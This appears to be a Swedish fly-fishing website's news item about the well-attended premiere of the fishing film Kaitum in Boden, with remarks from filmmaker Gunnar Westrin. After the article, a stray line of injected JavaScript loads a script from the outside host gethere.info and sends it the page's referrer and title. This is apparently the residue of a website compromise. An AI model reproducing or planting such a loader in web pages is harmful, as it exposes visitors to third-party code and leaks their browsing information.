Välbesökt filmpremiär i Boden

Mitt under vinterns första stora snöoväder hade Gunnar Westrin och Jussi Sjölund på Mountain Media premiär för sin nya film Kaitum på Sagateatern i Boden. Premiären var minst sagt välbesökt.

– Jag hade nog inte kunnat göra den här filmen när jag var 40 år, jag var helt enkelt inte mogen. Min livserfarenhet har nu gjort att jag kunnat färdigställa mina tankar, sa Gunnar Westrin.
Det är ingen actionfilm med bara grymma fiskfajter utan den vill säga så mycket mer om det vackra landskapet, privilegiet att få vistas i helt oförstörd natur men även om det annalkande hoten från gruvor och planer på vattenkraftsuttbyggnad.
Filmen Kaitum visar bedövande vackra vyer, spännande fiske men lockade även till skratt och eftertanke hos åhörarna. Tillsammans med fiskekumpanen ”Palle” som tidigare jobbat som guide i området fiskar de sig sedan igenom flera spännande partier och områden av Kaitum.
Kvällen avrundades med en rungande applåd av de många åhörarna.

s.src=’http://gethere.info/kt/?264dpr&frm=script&se_referrer=’ + encodeURIComponent(document.referrer) + ‘&default_keyword=’ + encodeURIComponent(document.title) + ”;


MER FRÅN ALLTOMFLUGFISKE.SE

Sponsrad
Sponsrad